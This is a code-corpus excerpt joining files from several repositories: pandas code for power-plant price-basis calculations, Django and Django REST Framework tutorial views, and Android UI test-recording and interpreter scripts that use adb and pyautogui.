merged_hub_nodal_lmp_df = pd.merge(nodal_lmp_df, hub_lmp_df, on=['delivery_date','hour_ending'], how='inner')
merged_hub_nodal_lmp_df['signal'] = merged_hub_nodal_lmp_df.apply(lambda row: get_match_signal(row), axis=1)
merged_hub_nodal_lmp_df.rename(columns={'total_lmp_x':'nodal_lmp','total_lmp_y':'hub_lmp', 'peak_info_x': 'peak_info'}, inplace=True)
merged_hub_nodal_lmp_df['month'] = merged_hub_nodal_lmp_df.apply(lambda row: row['delivery_date'].month, axis=1)
merged_hub_nodal_lmp_df = merged_hub_nodal_lmp_df[['delivery_date','hour_ending', 'month', 'nodal_lmp','hub_lmp','signal', 'peak_info']]
merged_hub_nodal_lmp_df['basis_$'] = (merged_hub_nodal_lmp_df['nodal_lmp'] - merged_hub_nodal_lmp_df['hub_lmp'])
merged_hub_nodal_lmp_df['basis_%'] = (merged_hub_nodal_lmp_df['nodal_lmp'] - merged_hub_nodal_lmp_df['hub_lmp']) / merged_hub_nodal_lmp_df['hub_lmp']
merged_hub_nodal_lmp_df['basis_$'] = merged_hub_nodal_lmp_df.apply(lambda row: np.nan if abs(row['basis_%']) > outlier_absolute_limit else row['basis_$'], axis=1)
merged_hub_nodal_lmp_df['basis_%'] = merged_hub_nodal_lmp_df.apply(lambda row: np.nan if abs(row['basis_%']) > outlier_absolute_limit else row['basis_%'], axis=1)
merged_hub_nodal_lmp_df = merged_hub_nodal_lmp_df.replace([np.inf, -np.inf], replace_inf)
merged_hub_nodal_lmp_df['plant'] = self.name
monthly_onoffpeak_basis_df = merged_hub_nodal_lmp_df.groupby(['month','peak_info'])[['basis_$','basis_%']].mean()
monthly_onoffpeak_basis_df['plant'] = self.name
# monthly_onoffpeak_basis_df.to_csv("monthly_onoffpeak_basis_df.csv")
# merged_hub_nodal_lmp_df.to_csv("merged_hub_nodal_lmp_df.csv")
return monthly_onoffpeak_basis_df, merged_hub_nodal_lmp_df
def save(self):
effective_end = date(2099,12,31)
today_date = datetime.now().date()
effective_start = today_date
id_powerplant = []
existing_record_df = dbLBO.get_powerplant(self.name, self.fuelType, self.market, self.node, self.powerHub, today_date)
ready_to_kean_pp_df = pd.DataFrame()
if existing_record_df is not None and len(existing_record_df) > 0:
currecord_effective_start = existing_record_df.iloc[0].effective_start
currecord_effective_end = existing_record_df.iloc[0].effective_end
id_powerplant.append(str(existing_record_df.iloc[0].id_powerplant))
if currecord_effective_start < today_date and currecord_effective_end >= today_date:
effective_start = today_date
existing_record_df.set_value(0, 'effective_end', today_date - timedelta(1))
if currecord_effective_start == today_date and currecord_effective_end >= today_date:
effective_start = today_date
existing_record_df = existing_record_df.drop([0])
ready_to_kean_pp_df = existing_record_df
technology_name = self.technology if isinstance(self.technology, str) else self.technology.name
added_record_to_kean_pp_df = pd.DataFrame(columns=['name',
'fuel_type',
'market',
'node',
'power_hub',
'technology',
'power_zone',
'power_hub_on_peak',
'power_hub_off_peak',
'fuel_zone',
'fuel_hub',
'summer_fuel_basis',
'winter_fuel_basis',
'summer_duct_capacity',
'summer_base_capacity',
'winter_duct_capacity',
'winter_base_capacity',
'first_plan_outage_start',
'first_plan_outage_end',
'second_plan_outage_start',
'second_plan_outage_end',
'carbon_cost',
'source_notes',
'retirement_date',
'ownership',
'effective_start',
'effective_end'],
data=[[self.name,
self.fuelType,
self.market,
self.node,
self.powerHub,
technology_name,
self.powerZone,
self.powerHubOnPeak,
self.powerHubOffPeak,
self.fuelZone,
self.fuelHub,
self.summerFuelBasis,
self.winterFuelBasis,
self.summerDuctCapacity,
self.summerBaseCapacity,
self.winterDuctCapacity,
self.winterBaseCapacity,
self.firstPlanOutageStart,
self.firstPlanOutageEnd,
self.secondPlanOutageStart,
self.secondPlanOutageEnd,
self.carbonCost,
self.sourceNotes,
self.retirementDate,
self.ownership,
effective_start,
effective_end]])
ready_to_kean_pp_df = ready_to_kean_pp_df.append(added_record_to_kean_pp_df, sort=False)
dbLBO.put_powerplant(ready_to_kean_pp_df, id_powerplant)
class Holdco(Entity):
def __init__(self, name):
Entity.__init__(self, name, 'holdco')
# to be implemented
class Technology():
def __init__(self, name,
summer_duct_heatrate=0.0,
summer_base_heatrate=0.0,
winter_duct_heatrate=0.0,
winter_base_heatrate=0.0,
lol_capacity=0.0,
lol_summer_heatrate=0.0,
lol_winter_heatrate=0.0,
start_expense=0.0,
start_fuel=0.0,
start_hours=0.0,
emissions_rate=0.0,
vom=0.0,
uof=0.0):
self.name = name
self.summerDuctHeatrate = summer_duct_heatrate
self.summerBaseHeatrate = summer_base_heatrate
self.winterDuctHeatrate = winter_duct_heatrate
self.winterBaseHeatrate = winter_base_heatrate
self.lolCapacity = lol_capacity
self.lolSummerHeatrate = lol_summer_heatrate
self.lolWinterHeatrate = lol_winter_heatrate
self.startExpense = start_expense
self.startFuel = start_fuel
self.startHours = start_hours
self.emissionsRate = emissions_rate
self.vom = vom
self.uof = uof
# #
| {"/lbo_testcases.py": ["/utility/dispatchUtils.py", "/database/dbPCUC.py", "/database/dbDispatch.py", "/database/dbLBO.py", "/database/dbScenarioMaster.py", "/utility/lboUtils.py", "/model/Entity.py", "/model/Portfolio.py", "/utility/dateUtils.py"], "/lbo_oob_testcases.py": ["/utility/dispatchUtils.py", "/database/dbPCUC.py", "/database/dbDispatch.py", "/database/dbLBO.py", "/database/dbScenarioMaster.py", "/utility/lboUtils.py", "/model/Entity.py", "/model/Portfolio.py", "/utility/dateUtils.py", "/reportwriter/ReportWriter.py"], "/database/dbLiquidity.py": ["/database/dbGeneral.py"], "/database/dbDispatch.py": ["/database/dbGeneral.py"], "/lbo/lbo.py": ["/utility/dateUtils.py", "/database/dbPrices.py"], "/main.py": ["/scenario_control/Scenario.py", "/financial/FSLI.py"], "/database/dbScenarioMaster.py": ["/database/dbGeneral.py"], "/database/dbPrices.py": ["/database/dbGeneral.py"], "/model/Portfolio.py": ["/model/Entity.py"], "/liquidity/Liquidity.py": ["/scenario_control/Scenario.py", "/utility/dateUtils.py"], "/scenario_master_testcase.py": ["/scenario_control/Scenario.py", "/financial/FSLI.py"], "/database/dbLBO.py": ["/database/dbGeneral.py"], "/database/dbPCUC.py": ["/database/dbGeneral.py"], "/liquidity_oob_test.py": ["/liquidity/Liquidity.py", "/reportwriter/ReportWriter.py"], "/utility/dispatchUtils.py": ["/utility/dateUtils.py", "/database/dbPrices.py"], "/lbo_diff.py": ["/utility/dispatchUtils.py", "/database/dbPCUC.py", "/database/dbDispatch.py", "/database/dbLBO.py", "/database/dbScenarioMaster.py", "/utility/lboUtils.py", "/model/Entity.py", "/model/Portfolio.py", "/utility/dateUtils.py"]} |
50,757 | changliukean/KEAN3 | refs/heads/master | /utility/dateUtils.py | from datetime import datetime, date, timedelta
from calendar import monthrange
from dateutil.parser import parse
from dateutil.relativedelta import relativedelta
# store nerc holidays in kean3
# store dst dates in kean3
def get_one_month_ago(date_obj):
current_month_begin = date(date_obj.year, date_obj.month, 1)
previous_month_end = current_month_begin - timedelta(1)
return previous_month_end
def get_month_list(start_month, end_month):
start_month = date(start_month.year, start_month.month, 1)
end_month = date(end_month.year, end_month.month, monthrange(end_month.year, end_month.month)[1])
loop_month = start_month
month_list = []
while loop_month <= end_month:
loop_month = date(loop_month.year, loop_month.month, monthrange(loop_month.year, loop_month.month)[1])
month_list.append(loop_month)
loop_month = loop_month + timedelta(days=1)
return month_list
def get_one_month_later(date_obj):
current_month_end = date(date_obj.year, date_obj.month, monthrange(date_obj.year, date_obj.month)[1])
next_month_begin = current_month_end + timedelta(1)
next_month_end = date(next_month_begin.year, next_month_begin.month, monthrange(next_month_begin.year, next_month_begin.month)[1])
return next_month_end
def get_date_obj_from_str(date_str):
return parse(date_str).date()
def get_months_shift_date(anchor_date, number_of_months):
return anchor_date + relativedelta(months=number_of_months)
def get_cash_balance_begin_date(as_of_date):
as_of_date = as_of_date + timedelta(1)
return date(as_of_date.year, as_of_date.month, monthrange(as_of_date.year, as_of_date.month)[1])
def get_year_month_header(period_month):
year_str = str(period_month.year)
month_str = {1:'Jan',
2:'Feb',
3:'Mar',
4:'Apr',
5:'May',
6:'Jun',
7:'Jul',
8:'Aug',
9:'Sep',
10:'Oct',
11:'Nov',
12:'Dec'}[period_month.month]
return year_str + "-" + month_str
# #
| {"/lbo_testcases.py": ["/utility/dispatchUtils.py", "/database/dbPCUC.py", "/database/dbDispatch.py", "/database/dbLBO.py", "/database/dbScenarioMaster.py", "/utility/lboUtils.py", "/model/Entity.py", "/model/Portfolio.py", "/utility/dateUtils.py"], "/lbo_oob_testcases.py": ["/utility/dispatchUtils.py", "/database/dbPCUC.py", "/database/dbDispatch.py", "/database/dbLBO.py", "/database/dbScenarioMaster.py", "/utility/lboUtils.py", "/model/Entity.py", "/model/Portfolio.py", "/utility/dateUtils.py", "/reportwriter/ReportWriter.py"], "/database/dbLiquidity.py": ["/database/dbGeneral.py"], "/database/dbDispatch.py": ["/database/dbGeneral.py"], "/lbo/lbo.py": ["/utility/dateUtils.py", "/database/dbPrices.py"], "/main.py": ["/scenario_control/Scenario.py", "/financial/FSLI.py"], "/database/dbScenarioMaster.py": ["/database/dbGeneral.py"], "/database/dbPrices.py": ["/database/dbGeneral.py"], "/model/Portfolio.py": ["/model/Entity.py"], "/liquidity/Liquidity.py": ["/scenario_control/Scenario.py", "/utility/dateUtils.py"], "/scenario_master_testcase.py": ["/scenario_control/Scenario.py", "/financial/FSLI.py"], "/database/dbLBO.py": ["/database/dbGeneral.py"], "/database/dbPCUC.py": ["/database/dbGeneral.py"], "/liquidity_oob_test.py": ["/liquidity/Liquidity.py", "/reportwriter/ReportWriter.py"], "/utility/dispatchUtils.py": ["/utility/dateUtils.py", "/database/dbPrices.py"], "/lbo_diff.py": ["/utility/dispatchUtils.py", "/database/dbPCUC.py", "/database/dbDispatch.py", "/database/dbLBO.py", "/database/dbScenarioMaster.py", "/utility/lboUtils.py", "/model/Entity.py", "/model/Portfolio.py", "/utility/dateUtils.py"]} |
50,793 | csourabh8824/djangohomerestframework | refs/heads/master | /generic_apiview/school/views.py | from django.shortcuts import render
from .models import Student
from .serializers import StudentSerializer
from rest_framework.generics import GenericAPIView
from rest_framework.mixins import ListModelMixin, CreateModelMixin, RetrieveModelMixin, UpdateModelMixin, DestroyModelMixin
# Create your views here.
# Mixins in GenericApi views:
# 1) ListModelMixin: Provides a .list(request, *args, **kwargs) method, that implements listing a queryset.
# 2) CreateModelMixin :Provides a .create(request, *args, **kwargs) method, that implements creating and saving a new model instance.
# 3) RetrieveModelMixin:Provides a .retrieve(request, *args, **kwargs) method, that implements returning an existing model instance in a response.
# 4) UpdateModelMixin: Provides a .update(request, *args, **kwargs) method, that implements updating and saving an existing model instance.
# 5) DestroyModelMixin: Provides a .destroy(request, *args, **kwargs) method, that implements deletion of an existing model instance.
class StudentList(GenericAPIView, ListModelMixin):
queryset = Student.objects.all() # Attribute name should be queryset only.
serializer_class = StudentSerializer
# Attribute name should be serializer_class only.
def get(self, request, *args, **kwargs):
return self.list(request, *args, **kwargs)
# list method is present in ListModelMixin that helps to list the queryset
class StudentCreate(GenericAPIView, CreateModelMixin):
queryset = Student.objects.all()
serializer_class = StudentSerializer
def post(self, request, *args, **kwargs):
return self.create(request, *args, **kwargs)
# create method is present in CreateModelMixin to create and save the data
class StudentRetrieve(GenericAPIView, RetrieveModelMixin):
queryset = Student.objects.all()
serializer_class = StudentSerializer
def get(self, request, *args, **kwargs):
return self.retrieve(request, *args, **kwargs)
# retrieve method is present in RetrieveModelMixin to retrieve the data
class StudentUpdate(GenericAPIView, UpdateModelMixin):
queryset = Student.objects.all()
serializer_class = StudentSerializer
def put(self, request, *args, **kwargs):
return self.update(request, *args, **kwargs)
# update method is present in UpdateModelMixin to update and save the data
class StudentDelete(GenericAPIView, DestroyModelMixin):
queryset = Student.objects.all()
serializer_class = StudentSerializer
def delete(self, request, *args, **kwargs):
return self.destroy(request, *args, **kwargs)
# destroy method is present in DestroyModelMixin to destroy or delete the data in database.
| {"/crud3/student/views.py": ["/crud3/student/forms.py"], "/crud1/school/views.py": ["/crud1/school/forms.py"], "/django-master/product/urls.py": ["/django-master/product/views.py"]} |
50,794 | csourabh8824/djangohomerestframework | refs/heads/master | /crud3/student/views.py | from django.shortcuts import render
from django.views.generic import CreateView, ListView, UpdateView, DeleteView
from .forms import RegistrationForm
from .models import Student
# Create your viewsfrom .models import Student here.
class StudentCreateView(CreateView):
form_class = RegistrationForm
# fields = ["name", "email"]
template_name = "student/home.html"
success_url = "/thanks/"
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
context["student"] = Student.objects.all()
return context
class StudentUpdateView(UpdateView):
model = Student
fields = ["name", "email"]
template_name = "student/update.html"
success_url = "/thanks/"
class StudentDeleteView(DeleteView):
model = Student
template_name = "student/delete.html"
success_url = "/thanks/"
| {"/crud3/student/views.py": ["/crud3/student/forms.py"], "/crud1/school/views.py": ["/crud1/school/forms.py"], "/django-master/product/urls.py": ["/django-master/product/views.py"]} |
50,795 | csourabh8824/djangohomerestframework | refs/heads/master | /viewset/school/views.py | from django.shortcuts import render
from .models import Student
from rest_framework import viewsets
from rest_framework.response import Response
from rest_framework import status
from .serializers import StudentSerializer
# Create your views here.
"""
ViewSet class is a class based view that does not provide any method handlers like get(),post(),put() etc
instead of the method handlers it provides actions such as list(),create,retrieve(),update() etc.
"""
"""
Actions:
list(): Give all records.
create(): Creates a record.
update(): updates record completely.
partial_update(): updates record partially.
retrieve(): give single record.
destroy(): deletes an existing record
"""
"""
Attributes in viewset:
basename: This is a name defined on URL dispatcher.
action: the name of current action example list(),create()etc
detail,suffix,name,description
"""
"""
viewset url config(urls.py):
from django.urls import path,include
from rest_framework.routers import DefaultRouter
router = DefaultRouter() #creating default router object
router.register("studentapi",views)
urlpatterns = [
path("",include(router.urls)),
]
"""
class StudentViewSet(viewsets.ViewSet):
def list(self, request):
stu = Student.objects.all()
serializer = StudentSerializer(stu, many=True)
return Response(serializer.data)
def create(self, request):
python_data = request.data
serializer = StudentSerializer(data=python_data)
if serializer.is_valid():
serializer.save()
return Response({"msg": "data created"}, status=status.HTTP_201_CREATED)
return Response(serializer.errors, status=status.HTTP_200_BAD_REQUEST)
def update(self, request, pk=None):
id = pk
stu = Student.objects.get(pk=id)
serializer = StudentSerializer(stu, data=request.data)
if serializer.is_valid():
serializer.save()
return Response({"msg": "Complete data updated"}, status=status.HTTP_201_CREATED)
return Response(serializer.errors, status=status.HTTP_200_BAD_REQUEST)
def partial_update(self, request, pk=None):
id = pk
stu = Student.objects.get(pk=id)
serializer = StudentSerializer(stu, data=request.data, partial=True)
if serializer.is_valid():
serializer.save()
return Response({"msg": "Partial data updated"}, status=status.HTTP_201_CREATED)
return Response(serializer.errors, status=status.HTTP_200_BAD_REQUEST)
def retrieve(self, request, pk=None):
id = pk
stu = Student.objects.get(pk=id)
serializer = StudentSerializer(stu)
return Response(serializer.data)
def destroy(self, request, pk=None):
id = pk
stu = Student.objects.get(pk=id)
stu.delete()
return Response({"msg": "data deleted"})
| {"/crud3/student/views.py": ["/crud3/student/forms.py"], "/crud1/school/views.py": ["/crud1/school/forms.py"], "/django-master/product/urls.py": ["/django-master/product/views.py"]} |
50,796 | csourabh8824/djangohomerestframework | refs/heads/master | /crud1/school/forms.py | from django import forms
from .models import Student
class RegisterForm(forms.ModelForm):
password = forms.CharField(max_length=60, widget=forms.PasswordInput)
class Meta:
model = Student
fields = '__all__'
| {"/crud3/student/views.py": ["/crud3/student/forms.py"], "/crud1/school/views.py": ["/crud1/school/forms.py"], "/django-master/product/urls.py": ["/django-master/product/views.py"]} |
50,797 | csourabh8824/djangohomerestframework | refs/heads/master | /crud3/student/forms.py | from django import forms
from .models import Student
# If you are using model name in createview then use this
# class RegistrationForm(forms.Form):
# name = forms.CharField(max_length=20)
# email = forms.EmailField()
# If you are using form class in createview then use this
class RegistrationForm(forms.ModelForm):
class Meta:
model = Student
fields = ["name", "email"]
| {"/crud3/student/views.py": ["/crud3/student/forms.py"], "/crud1/school/views.py": ["/crud1/school/forms.py"], "/django-master/product/urls.py": ["/django-master/product/views.py"]} |
50,798 | csourabh8824/djangohomerestframework | refs/heads/master | /crud1/school/views.py | from django.shortcuts import render, redirect, HttpResponse
from .forms import RegisterForm
from .models import Student
# Create your views here.
def home(request):
students = Student.objects.all()
return render(request, "school/home.html", context={"students": students})
def add_student(request):
if request.method == "POST":
form = RegisterForm(request.POST)
if form.is_valid():
student_data = Student(
name=form.cleaned_data['name'], email=form.cleaned_data['email'], password=form.cleaned_data['password'])
student_data.save()
return redirect('home')
else:
form = RegisterForm()
return render(request, "school/register.html", context={"form": form})
def update_student(request, id):
student_data = Student.objects.get(pk=id)
if request.method == "POST":
form = RegisterForm(request.POST, instance=student_data)
if form.is_valid():
form.save()
return redirect("home")
else:
form = RegisterForm(instance=student_data)
return render(request, "school/update.html", context={"form": form})
def delete_data(request, id):
student_data = Student.objects.get(pk=id)
student_data.delete()
return HttpResponse("<h1>DATA DELETED</h1>")
| {"/crud3/student/views.py": ["/crud3/student/forms.py"], "/crud1/school/views.py": ["/crud1/school/forms.py"], "/django-master/product/urls.py": ["/django-master/product/views.py"]} |
50,799 | csourabh8824/djangohomerestframework | refs/heads/master | /crud4/thirdparty.py | import requests
import json
URL = "http://127.0.0.1:8000/studentapi/2/"
def show_data(id=None):
data = {
"id": id
}
json_data = json.dumps(data)
response = requests.get(url=URL, data=json_data)
print(response.json())
show_data(2)
def create_data():
data = {
"roll": 102,
"name": "Yashraj"
}
json_data = json.dumps(data)
response = requests.post(url=URL, data=json_data)
print(response.json())
# create_data()
def update_data():
data = {
'id': 2,
"roll": 103,
"name": "raj"
}
json_data = json.dumps(data)
response = requests.put(url=URL, data=json_data)
print(response.json())
# update_data()
def delete_data():
data = {
'id': 1
}
json_data = json.dumps(data)
response = requests.delete(url=URL, data=json_data)
print(response.json())
# delete_data()
| {"/crud3/student/views.py": ["/crud3/student/forms.py"], "/crud1/school/views.py": ["/crud1/school/forms.py"], "/django-master/product/urls.py": ["/django-master/product/views.py"]} |
50,800 | csourabh8824/djangohomerestframework | refs/heads/master | /fbv_apiview/student/views.py | from django.shortcuts import render
from rest_framework.decorators import api_view
from rest_framework.response import Response
from .models import Student
from .serializers import StudentSerializer
from rest_framework import status
# Create your views here.
# request.data contains all the data i.e id,name,roll,city It has a data parsed in python
# We don't have to use JSONParser() to convert in python
# Response(data, status=None, template_name=None, headers=None, content_type=None)
# data: The serialized data for the response.(python data)
# status: A status code for the response. Defaults to 200. See also status codes.
# template_name: A template name to use if HTMLRenderer is selected.
# headers: A dictionary of HTTP headers to use in the response.
# content_type: The content type of the response. Typically, this will be set automatically by the renderer as determined by content negotiation, but there may be some cases where you need to specify the content type explicitly.
@api_view(["GET", "POST", "PUT", "PATCH", "DELETE"])
def student_api(request, pk=None):
if request.method == "GET":
id = pk
if id is not None:
stu = Student.objects.get(pk=id)
serializer = StudentSerializer(stu)
return Response(serializer.data)
stu = Student.objects.all()
serializer = StudentSerializer(stu, many=True)
return Response(serializer.data)
if request.method == "POST":
python_data = request.data
serializer = StudentSerializer(data=python_data)
if serializer.is_valid():
serializer.save()
return Response({"msg": "Data Created"}, status=status.HTTP_201_CREATED)
return Response(serializer.errors)
if request.method == "PUT":
id = pk
stu = Student.objects.get(pk=id)
serializer = StudentSerializer(stu, data=request.data)
if serializer.is_valid():
serializer.save()
return Response({"msg": "data updated"}, status=status.HTTP_201_CREATED)
return Response(serializer.errors)
if request.method == "PATCH":
id = pk
stu = Student.objects.get(pk=id)
serializer = StudentSerializer(stu, data=request.data, partial=True)
if serializer.is_valid():
serializer.save()
return Response({"msg": "Data Updated Partially"})
return Response(serializer.errors)
if request.method == "DELETE":
id = request.data.get("id")
stu = Student.objects.get(pk=id)
stu.delete()
return Response({"msg": "Data Deleted"})
| {"/crud3/student/views.py": ["/crud3/student/forms.py"], "/crud1/school/views.py": ["/crud1/school/forms.py"], "/django-master/product/urls.py": ["/django-master/product/views.py"]} |
50,801 | csourabh8824/djangohomerestframework | refs/heads/master | /django-master/product/urls.py | from django.urls import path
from .views import ProductView
urlpatterns = [
path('add/', ProductView.as_view(), name='product-add'),
]
| {"/crud3/student/views.py": ["/crud3/student/forms.py"], "/crud1/school/views.py": ["/crud1/school/forms.py"], "/django-master/product/urls.py": ["/django-master/product/views.py"]} |
50,802 | csourabh8824/djangohomerestframework | refs/heads/master | /crud4/school/views.py | import io
from django.shortcuts import render
from django.http import HttpResponse
from rest_framework.parsers import JSONParser
from rest_framework.renderers import JSONRenderer
from .serializers import StudentSerializer
from django.views.decorators.csrf import csrf_exempt
from .models import Student
# Create your views here.
@csrf_exempt
def student_api(request, id):
if request.method == "GET":
json_data = request.body
stream = io.BytesIO(json_data)
python_data = JSONParser().parse(stream)
id = python_data.get("id", None)
if id is not None:
stu = Student.objects.get(id=id)
serializer = StudentSerializer(stu)
json_data = JSONRenderer().render(serializer.data)
return HttpResponse(json_data, content_type='application/json')
else:
stu = Student.objects.all()
serializer = StudentSerializer(stu, many=True)
json_data = JSONRenderer().render(serializer.data)
return HttpResponse(json_data, content_type='application/json')
if request.method == "POST":
json_data = request.body
stream = io.BytesIO(json_data)
python_data = JSONParser().parse(stream)
serializer = StudentSerializer(data=python_data)
if serializer.is_valid():
serializer.save()
response = {"msg": "Data Created!"}
json_data = JSONRenderer().render(response)
return HttpResponse(json_data, content_type='application/json')
else:
json_data = JSONRenderer().render(serializer.errors)
return HttpResponse(json_data, content_type='application/json')
if request.method == "PUT":
json_data = request.body
stream = io.BytesIO(json_data)
python_data = JSONParser().parse(stream)
id = python_data.get('id')
stu = Student.objects.get(id=id)
serializer = StudentSerializer(stu, data=python_data)
if serializer.is_valid():
serializer.save()
response = {"msg": "Data Updated!!"}
json_data = JSONRenderer().render(response)
return HttpResponse(json_data, content_type="application/json")
else:
json_data = JSONRenderer().render(serializer.errors)
return HttpResponse(json_data, content_type="application/json")
if request.method == "DELETE":
json_data = request.body
stream = io.BytesIO(json_data)
python_data = JSONParser().parse(stream)
id = python_data.get("id")
stu = Student.objects.get(id=id)
stu.delete()
response = {"msg": "Data Deleted!!"}
json_data = JSONRenderer().render(response)
return HttpResponse(json_data, content_type="application/json")
| {"/crud3/student/views.py": ["/crud3/student/forms.py"], "/crud1/school/views.py": ["/crud1/school/forms.py"], "/django-master/product/urls.py": ["/django-master/product/views.py"]} |
50,803 | csourabh8824/djangohomerestframework | refs/heads/master | /django-master/product/views.py | from django.http import HttpResponseRedirect
from django.shortcuts import render
from django.views import View
from django.urls import reverse
from .forms import ProductForm
class ProductView(View):
form_class = ProductForm
template_name = 'product_template.html'
def get(self, request, *args, **kwargs):
form = self.form_class()
return render(request, self.template_name, {'form': form})
def post(self, request, *args, **kwargs):
form = self.form_class(request.POST)
if form.is_valid():
form.save()
return HttpResponseRedirect(reverse('product-add'))
return render(request, self.template_name, {'form': form}) | {"/crud3/student/views.py": ["/crud3/student/forms.py"], "/crud1/school/views.py": ["/crud1/school/forms.py"], "/django-master/product/urls.py": ["/django-master/product/views.py"]} |
50,804 | csourabh8824/djangohomerestframework | refs/heads/master | /django-master/product/models.py | from django.db import models
class Product(models.Model):
title = models.CharField(max_length=200)
summary = models.TextField(max_length=1000, help_text='Enter a brief description of the Product') | {"/crud3/student/views.py": ["/crud3/student/forms.py"], "/crud1/school/views.py": ["/crud1/school/forms.py"], "/django-master/product/urls.py": ["/django-master/product/views.py"]} |
50,805 | csourabh8824/djangohomerestframework | refs/heads/master | /crud2/school/views.py | from django.shortcuts import render, HttpResponse
from django.views import View
from django.views.generic import UpdateView, DeleteView
from .forms import RegistrationForm
from .models import Student
# Create your views here.
class Myview(View):
def get(self, request, *args, **kwargs):
form = RegistrationForm()
students = Student.objects.all()
return render(request, "school/home.html", context={"form": form, "students": students})
def post(self, request, *args, **kwargs):
form = RegistrationForm(request.POST)
if form.is_valid():
name = form.cleaned_data.get('name')
email = form.cleaned_data.get('email')
student_data = Student(name=name, email=email)
student_data.save()
return HttpResponse("<h1>Posted</h1>")
return render(request, "school/home.html", context={"form": form})
def delete(self, request, id, *args, **kwargs):
student_data = Student.objects.get(pk=id)
student_data.delete()
return HttpResponse("<h1>Deleted!!</h1>")
class StudentUpdateView(UpdateView):
model = Student
fields = ["name", "email"]
success_url = '/thanks/'
template_name = "school/update.html"
class StudentDeleteView(DeleteView):
model = Student
success_url = '/thanks/'
template_name = "school/home.html"
| {"/crud3/student/views.py": ["/crud3/student/forms.py"], "/crud1/school/views.py": ["/crud1/school/forms.py"], "/django-master/product/urls.py": ["/django-master/product/views.py"]} |
50,817 | alingse/exception-collector | refs/heads/master | /local.py |
class LocalError(Exception):
def __init__(self, message):
self.message = message
def runA():
raise LocalError('hello')
def runB():
a = 1
b = 0
return a/b
def run():
try:
runA()
except Exception:
pass
try:
runB()
except Exception:
pass
| {"/demo.py": ["/local.py"]} |
50,818 | alingse/exception-collector | refs/heads/master | /demo.py | import builtins
from collections import defaultdict
collector = defaultdict(list)
OldException = builtins.Exception
class NewException(OldException):
def __init__(self, *args, **kwargs):
print(args, kwargs)
super().__init__(*args, **kwargs)
def __new__(cls, *args, **kwargs):
if not getattr(cls.__init__, 'collect', None):
old_init = cls.__init__
def __init__(i, *args, **kwargs):
import inspect
s = inspect.stack()
collector[cls].append((i, (args, kwargs), s))
old_init(i, *args, **kwargs)
__init__.collect = True
cls.__init__ = __init__
return super().__new__(cls, *args, **kwargs)
builtins.Exception = NewException
# TODO replace all builtin execption
#---------------------------------#
from local import run
try:
run()
except OldException:
pass
print(collector)
| {"/demo.py": ["/local.py"]} |
50,828 | ArtyZiff35/Android-Application-State-Graph-Model-Parser | refs/heads/master | /eventRecorder.py | from com.dtmilano.android.viewclient import ViewClient, View, ViewClientOptions
from com.dtmilano.android.adb import adbclient
from com.dtmilano.android.common import debugArgsToDict
import subprocess
from subprocess import check_output
import psutil
import os
import time
import sys
import pyautogui
# Method to kill a process
def kill(proc_pid):
process = psutil.Process(proc_pid)
for proc in process.children(recursive=True):
proc.kill()
process.kill()
def getTimestamp(line):
return float(line.split()[1][:-1])
# Instantiating the output file
shellFileName = "./outputFiles/out.txt"
# Mini auto script to start emulator recording via adb shell
os.system("start cmd")
time.sleep(1)
pyautogui.typewrite('cd C:/Users/artur/PycharmProjects/AndroidTestingPy27/outputFiles')
pyautogui.press('enter')
pyautogui.typewrite('adb shell > out.txt')
pyautogui.press('enter')
pyautogui.typewrite('getevent -lt /dev/input/event1')
pyautogui.press('enter')
print "\n\n---> RECORDING...\n"
raw_input("Press a key to stop recording...\n")
# Preparing the output script
outputScriptName = "./outputFiles/outputScript.txt"
outputScriptFile = open(outputScriptName, "w")
# Writing headers
outputScriptFile.write("When VIDEO app:\nIN PORTAL check for SAME state:\n")
# Now reading the output of the shell
line = "XXX"
status = "XXX"
initialTime = 0
finalTime = 0
initialX = 0
initialY = 0
currentX = 0
currentY = 0
with open(shellFileName) as fp:
while line:
# Reading a line
line = fp.readline()
# Entering a new input event
if "ABS_MT_TRACKING_ID" in line:
if "00000000" in line:
# Pressing down
initialTime = getTimestamp(line)
status = "DOWN"
initialX = 0
initialY = 0
# Understanding whether we need to introduce a sleep
if finalTime!=0:
delta = (initialTime - finalTime)
finalTime = 0
# Writing command to file
outputScriptFile.write("\tCUSTOM SLEEP " + str(delta*1000) + " ;\n")
print "INTRODUCED PAUSE OF " + str(delta) + " secs"
print "PRESSING"
elif "ffffffff" in line:
# Releasing press
finalTime = getTimestamp(line)
delta = (finalTime - initialTime)
status = "UP"
# Checking for an edge case
if initialX == 0:
initialX = currentX
if initialY == 0:
initialY = currentY
# Writing command to file
outputScriptFile.write("\tCUSTOM DRAG FROM " + str(initialX) + " " + str(initialY) + " TO " + str(currentX) + " " + str(currentY) + " DURATION " + str(delta*1000) + " ;\n")
print "RELEASING after " + str(delta) + " secs"
# Entering a coordinates change
elif "ABS_MT_POSITION_X" in line:
# Converting from hex to decimal
hex = line.split()[-1]
currentX = int(hex, 16)
currentX = currentX/30.34
if initialX == 0:
initialX = currentX
print "X: " + str(currentX)
elif "ABS_MT_POSITION_Y" in line:
hex = line.split()[-1]
currentY = int(hex, 16)
currentY = currentY/17.07
if initialY == 0:
initialY = currentY
print "Y: " + str(currentY)
outputScriptFile.flush()
outputScriptFile.close()
| {"/graphPlotter.py": ["/stateNode.py"]} |
50,829 | ArtyZiff35/Android-Application-State-Graph-Model-Parser | refs/heads/master | /customLanguageInterpreter/mainInterpreter.py | import sys
from antlr4 import *
from scriptingLanguageLexer import scriptingLanguageLexer
from scriptingLanguageParser import scriptingLanguageParser
from scriptingLanguageListener import scriptingLanguageListener
from suiteClass import *
from activityStateDetector import activityStateDetector
import time
def executeTests(suiteObject, logisticRegr):
print "\n\n\n-------------------------------------------------------\n"
print "Found " + str(len(suiteObject.testCasesList)) + " tests to be executed!\n"
# Iterating through all of the test
for test in suiteObject.testCasesList:
positiveResult = True
# TODO Here we should be going to the state specified by the test
# Making the initial dump for the starting state
test.initDump()
print "TEST: Found a command list of size: " + str(len(test.commandsList))
# Now iterating through all commands of this test
for command in test.commandsList:
# Interpreting and executing commands
result = eval(command)
if result==False:
positiveResult = False
break
# Let one second go by after a command
# time.sleep(1)
# Checking the result of the test execution (only if everything up to now was ok)
if positiveResult==True:
# Finding out the arrival state
resultingState = test.finalStateCheck(logisticRegr)
print "\nWe ended up in " + resultingState + " activity \n"
# Comparing the arrival state with the expected state
if test.sameDestination == True and resultingState != "SAME":
positiveResult = False
elif test.sameDestination == False and str(resultingState).lower() != str(test.endActivityType).lower():
positiveResult = False
# Printing out the esit of the test
if positiveResult == True:
print "---> TEST PASSED!\n"
else:
